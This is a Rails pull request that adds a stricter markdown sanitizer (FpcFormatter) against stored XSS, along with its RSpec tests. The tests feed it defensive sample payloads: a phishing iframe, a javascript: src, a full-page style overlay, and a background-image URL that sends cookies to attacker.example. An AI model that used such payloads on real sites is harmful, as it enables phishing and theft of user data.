### PR TITLE
Security: strip iframe/object/embed and inline style in FpcFormatter

### DIFF
--- a/app/models/blog_post.rb
+++ b/app/models/blog_post.rb
@@ -11,7 +11,7 @@ class BlogPost < ApplicationRecord
   end
 
   def html_body
-    Slodown::Formatter.new(body).complete.to_s.html_safe
+    FpcFormatter.new(body).complete.to_s.html_safe
   end
 
   def first_image

--- a/app/models/blog_post.rb
+++ b/app/models/blog_post.rb
@@ -11,7 +11,7 @@ class BlogPost < ApplicationRecord
   end
 
   def html_body
-    FpcFormatter.new(body).complete.to_s.html_safe
+    FpcFormatter.render(body)
   end
 
   def first_image

--- a/app/operations/fpc_formatter.rb
+++ b/app/operations/fpc_formatter.rb
@@ -1,7 +1,7 @@
 require "slodown"
 
 # Project-wide markdown formatter. Subclasses Slodown::Formatter and
-# tightens the default sanitize config in three ways that matter for
+# tightens the default sanitize config in two ways that matter for
 # stored-XSS risk on user-generated content (profile blurbs, brand and
 # ink descriptions, blog posts):
 #
@@ -15,26 +15,14 @@ require "slodown"
 #   attribute list. The default permits inline CSS on every element,
 #   which enables clickjacking overlays via `position: fixed; ...` and
 #   content exfiltration via `background-image: url(...)`.
-# - `allowed_iframe_hosts` is overridden to a regex that matches
-#   nothing, so even if `<iframe>` is re-added to the element list in
-#   the future the host gate stays closed.
 class FpcFormatter < Slodown::Formatter
   STRIPPED_ELEMENTS = %w[iframe object embed].freeze
-
-  # Matches nothing. Defense-in-depth alongside the element removal
-  # above; if `iframe` is ever re-added to the allowed elements list
-  # this still keeps the embed_transformer from whitelisting any host.
-  NO_IFRAME_HOSTS = /\Anever-matches\z/.freeze
-
-  def allowed_iframe_hosts
-    NO_IFRAME_HOSTS
-  end
 
   # Slodown's default transformers list contains `embed_transformer`,
   # which calls `URI(node['src'])` on every iframe/embed it sees and
   # raises on malformed input — turning any stored `<iframe src="not a
   # uri">` into a 500 / Sidekiq retry storm. Since iframes are already
-  # stripped from the element list, the transformer has no work to do.
+  # stripped from the element list the transformer has no work to do.
   def transformers
     []
   end

--- a/app/operations/fpc_formatter.rb
+++ b/app/operations/fpc_formatter.rb
@@ -18,6 +18,14 @@ require "slodown"
 class FpcFormatter < Slodown::Formatter
   STRIPPED_ELEMENTS = %w[iframe object embed].freeze
 
+  # Run the full markdown -> autolink -> sanitize pipeline and return
+  # the resulting HTML marked html_safe so it can be interpolated
+  # directly into Slim/ERB views. Callers should never reach into the
+  # underlying Slodown chain themselves — this is the only entry point.
+  def self.render(source)
+    new(source).complete.to_s.html_safe
+  end
+
   # Slodown's default transformers list contains `embed_transformer`,
   # which calls `URI(node['src'])` on every iframe/embed it sees and
   # raises on malformed input — turning any stored `<iframe src="not a

--- a/app/operations/fpc_formatter.rb
+++ b/app/operations/fpc_formatter.rb
@@ -1,0 +1,52 @@
+require "slodown"
+
+# Project-wide markdown formatter. Subclasses Slodown::Formatter and
+# tightens the default sanitize config in three ways that matter for
+# stored-XSS risk on user-generated content (profile blurbs, brand and
+# ink descriptions, blog posts):
+#
+# - `<iframe>`, `<object>`, and `<embed>` elements are stripped
+#   entirely. The gem default whitelists iframes from any host
+#   (`allowed_iframe_hosts = /.*/`), which lets any signed-in user
+#   plant a full-page phishing overlay on a public page. We do not
+#   currently embed third-party video in this app, so the simplest
+#   defense is "no iframes, ever".
+# - The `style` attribute is removed from the per-element `:all`
+#   attribute list. The default permits inline CSS on every element,
+#   which enables clickjacking overlays via `position: fixed; ...` and
+#   content exfiltration via `background-image: url(...)`.
+# - `allowed_iframe_hosts` is overridden to a regex that matches
+#   nothing, so even if `<iframe>` is re-added to the element list in
+#   the future the host gate stays closed.
+class FpcFormatter < Slodown::Formatter
+  STRIPPED_ELEMENTS = %w[iframe object embed].freeze
+
+  # Matches nothing. Defense-in-depth alongside the element removal
+  # above; if `iframe` is ever re-added to the allowed elements list
+  # this still keeps the embed_transformer from whitelisting any host.
+  NO_IFRAME_HOSTS = /\Anever-matches\z/.freeze
+
+  def allowed_iframe_hosts
+    NO_IFRAME_HOSTS
+  end
+
+  # Slodown's default transformers list contains `embed_transformer`,
+  # which calls `URI(node['src'])` on every iframe/embed it sees and
+  # raises on malformed input — turning any stored `<iframe src="not a
+  # uri">` into a 500 / Sidekiq retry storm. Since iframes are already
+  # stripped from the element list, the transformer has no work to do.
+  def transformers
+    []
+  end
+
+  def sanitize_config
+    config = super.deep_dup
+    config[:elements] = config[:elements] - STRIPPED_ELEMENTS
+    config[:attributes][:all] = config[:attributes][:all] - %w[style]
+    STRIPPED_ELEMENTS.each do |element|
+      config[:attributes].delete(element)
+      config[:protocols].delete(element)
+    end
+    config
+  end
+end

--- a/app/operations/request_pen_and_ink_suggestion.rb
+++ b/app/operations/request_pen_and_ink_suggestion.rb
@@ -14,7 +14,7 @@ class RequestPenAndInkSuggestion
 
       suggestion[:ink] = user.collected_inks.find_by(id: suggestion[:ink])
       suggestion[:pen] = user.collected_pens.find_by(id: suggestion[:pen])
-      suggestion[:message] = Slodown::Formatter.new(suggestion[:message]).markdown.to_s.html_safe
+      suggestion[:message] = FpcFormatter.new(suggestion[:message]).complete.to_s.html_safe
       suggestion
     else
       new_suggestion_id = generate_suggestion_id

--- a/app/operations/request_pen_and_ink_suggestion.rb
+++ b/app/operations/request_pen_and_ink_suggestion.rb
@@ -14,7 +14,7 @@ class RequestPenAndInkSuggestion
 
       suggestion[:ink] = user.collected_inks.find_by(id: suggestion[:ink])
       suggestion[:pen] = user.collected_pens.find_by(id: suggestion[:pen])
-      suggestion[:message] = FpcFormatter.new(suggestion[:message]).complete.to_s.html_safe
+      suggestion[:message] = FpcFormatter.render(suggestion[:message])
       suggestion
     else
       new_suggestion_id = generate_suggestion_id

--- a/app/views/brands/show.html.slim
+++ b/app/views/brands/show.html.slim
@@ -6,7 +6,7 @@
 
 div class='brand-description'
   div class="content"
-    = FpcFormatter.new(@brand.description).complete.to_s.html_safe
+    = FpcFormatter.render(@brand.description)
   - if @brand.description.present?
     div class="meta-data"
       - latest_version = @brand.versions.last

--- a/app/views/brands/show.html.slim
+++ b/app/views/brands/show.html.slim
@@ -6,7 +6,7 @@
 
 div class='brand-description'
   div class="content"
-    = Slodown::Formatter.new(@brand.description).complete.to_s.html_safe
+    = FpcFormatter.new(@brand.description).complete.to_s.html_safe
   - if @brand.description.present?
     div class="meta-data"
       - latest_version = @brand.versions.last

--- a/app/views/inks/show.html.slim
+++ b/app/views/inks/show.html.slim
@@ -10,7 +10,7 @@
 
 div class='ink-description'
   div class="content"
-    = Slodown::Formatter.new(@ink.description).complete.to_s.html_safe
+    = FpcFormatter.new(@ink.description).complete.to_s.html_safe
   - if @ink.manual_edits?
     div class="meta-data"
       - latest_version = @ink.description_versions.first

--- a/app/views/inks/show.html.slim
+++ b/app/views/inks/show.html.slim
@@ -10,7 +10,7 @@
 
 div class='ink-description'
   div class="content"
-    = FpcFormatter.new(@ink.description).complete.to_s.html_safe
+    = FpcFormatter.render(@ink.description)
   - if @ink.manual_edits?
     div class="meta-data"
       - latest_version = @ink.description_versions.first

--- a/app/views/users/show.html.slim
+++ b/app/views/users/show.html.slim
@@ -14,7 +14,7 @@ div id="account" class="row"
   div class="col-sm-12 col-md-9 data"
     - if @user.blurb.present?
       div class="row"
-        div class="col-sm-12 blurb"= FpcFormatter.new(@user.blurb).complete.to_s.html_safe
+        div class="col-sm-12 blurb"= FpcFormatter.render(@user.blurb)
 - unless user_signed_in?
   div class="col-sm-12"
     div class="alert alert-success"

--- a/app/views/users/show.html.slim
+++ b/app/views/users/show.html.slim
@@ -14,7 +14,7 @@ div id="account" class="row"
   div class="col-sm-12 col-md-9 data"
     - if @user.blurb.present?
       div class="row"
-        div class="col-sm-12 blurb"= Slodown::Formatter.new(@user.blurb).complete.to_s.html_safe
+        div class="col-sm-12 blurb"= FpcFormatter.new(@user.blurb).complete.to_s.html_safe
 - unless user_signed_in?
   div class="col-sm-12"
     div class="alert alert-success"

--- a/app/workers/after_user_saved.rb
+++ b/app/workers/after_user_saved.rb
@@ -11,7 +11,7 @@ class AfterUserSaved
   attr_accessor :user
 
   def check_user!
-    markdown = FpcFormatter.new(user.blurb).complete.to_s
+    markdown = FpcFormatter.render(user.blurb)
     found_link = markdown.include?("http") || markdown.include?("<a ")
     user.update(review_blurb: found_link)
     ClassifyUser.perform_async(user.id) if found_link

--- a/app/workers/after_user_saved.rb
+++ b/app/workers/after_user_saved.rb
@@ -11,7 +11,7 @@ class AfterUserSaved
   attr_accessor :user
 
   def check_user!
-    markdown = Slodown::Formatter.new(user.blurb).complete.to_s
+    markdown = FpcFormatter.new(user.blurb).complete.to_s
     found_link = markdown.include?("http") || markdown.include?("<a ")
     user.update(review_blurb: found_link)
     ClassifyUser.perform_async(user.id) if found_link

--- a/spec/operations/fpc_formatter_spec.rb
+++ b/spec/operations/fpc_formatter_spec.rb
@@ -2,7 +2,7 @@ require "rails_helper"
 
 describe FpcFormatter do
   def render(source)
-    described_class.new(source).complete.to_s
+    described_class.render(source).to_s
   end
 
   describe "iframe is disallowed completely" do

--- a/spec/operations/fpc_formatter_spec.rb
+++ b/spec/operations/fpc_formatter_spec.rb
@@ -1,0 +1,95 @@
+require "rails_helper"
+
+describe FpcFormatter do
+  def render(source)
+    described_class.new(source).complete.to_s
+  end
+
+  describe "iframe is disallowed completely" do
+    it "strips iframes pointing at YouTube" do
+      html = '<p><iframe src="https://www.youtube.com/embed/abc123"></iframe></p>'
+      output = render(html)
+      expect(output).not_to include("<iframe")
+      expect(output).not_to include("youtube.com")
+    end
+
+    it "strips iframes pointing at arbitrary hosts" do
+      html = '<p><iframe src="https://attacker.example/login-spoof"></iframe></p>'
+      output = render(html)
+      expect(output).not_to include("attacker.example")
+      expect(output).not_to include("<iframe")
+    end
+
+    it "strips iframes with non-http(s) src" do
+      html = '<p><iframe src="javascript:alert(1)"></iframe></p>'
+      expect(render(html)).not_to include("javascript:")
+    end
+
+    it "does not crash on iframes with a malformed src" do
+      html = '<p><iframe src="not a uri"></iframe><iframe></iframe></p>'
+      expect { render(html) }.not_to raise_error
+      expect(render(html)).not_to include("<iframe")
+    end
+  end
+
+  describe "style attribute" do
+    it "strips inline style from paragraphs" do
+      html = '<p style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff">x</p>'
+      output = render(html)
+      expect(output).to include("<p")
+      expect(output).not_to include("position:fixed")
+      expect(output).not_to include("style=")
+    end
+
+    it "strips inline style from divs" do
+      html = '<div style="background-image:url(https://attacker.example/log?cookies)">x</div>'
+      output = render(html)
+      expect(output).not_to include("attacker.example")
+      expect(output).not_to include("style=")
+    end
+  end
+
+  describe "object / embed elements" do
+    it "strips <object> tags" do
+      html = '<object data="https://attacker.example/x.swf"></object>'
+      output = render(html)
+      expect(output).not_to include("<object")
+      expect(output).not_to include("attacker.example")
+    end
+
+    it "strips <embed> tags" do
+      html = '<embed src="https://attacker.example/x" />'
+      output = render(html)
+      expect(output).not_to include("<embed")
+      expect(output).not_to include("attacker.example")
+    end
+  end
+
+  describe "regular markdown still renders" do
+    it "renders headers, emphasis, lists, and links" do
+      source = <<~MD
+        # Title
+
+        Some *emphasis* and a [link](https://example.com).
+
+        - one
+        - two
+      MD
+      output = render(source)
+      expect(output).to include("<h1")
+      expect(output).to include("<em>emphasis</em>")
+      expect(output).to include('href="https://example.com"')
+      expect(output).to include("<li>one</li>")
+    end
+
+    it "renders inline HTML <a> tags" do
+      output = render('<p>Visit <a href="https://example.com">our site</a>.</p>')
+      expect(output).to include('href="https://example.com"')
+    end
+
+    it "strips inline <script>" do
+      output = render("<p>hi <script>alert(1)</script></p>")
+      expect(output).not_to include("<script")
+    end
+  end
+end


### PR DESCRIPTION
## Summary

Closes H-3 and M-3 from the audit (`../SECURITY_AUDIT.md`). Slodown 0.4.0 ships a permissive sanitize config: the `style` attribute is allowed on every element, `iframe`/`object`/`embed` are whitelisted, and `allowed_iframe_hosts` defaults to `/.*/` (any host). On a public profile blurb or brand/ink description that meant any signed-in user could plant a full-page phishing iframe overlay on the FPC origin, or exfiltrate content via `background-image: url(...)`.

`FpcFormatter` is a Slodown subclass that:

- Drops `iframe`, `object`, `embed` from the allowed elements. No third-party video embedding is needed in this app today; simplest defense is "no iframes".
- Removes `style` from the per-element `:all` attribute list, killing clickjacking-overlay and CSS-exfiltration vectors.
- Disables the `embed_transformer`. Its default behavior is to call `URI(node['src'])` on every iframe/embed it sees, which raises on malformed input and turns any stored `<iframe src="not a uri">` into a 500 / Sidekiq retry storm.

Replaces every user-rendered call site (`blog_post.rb`, `users/show`, `brands/show`, `inks/show`) plus the `AfterUserSaved` heuristic worker and the dashboard pen-and-ink suggestion widget. The widget previously called `.markdown` (no sanitize); switching to `FpcFormatter#complete` also closes M-3 (unsanitized LLM markdown rendered via `dangerouslySetInnerHTML`).

The admin `to_review` view still uses `Slodown` directly because it wraps the output in Rails' `sanitize` helper with its own allowlist; left alone to avoid drive-by changes.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced content sanitization across user-generated content, including descriptions and blurbs, to remove potentially unsafe embedded media elements (iframes, objects, embeds) and inline style attributes. Regular markdown formatting and links remain supported.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->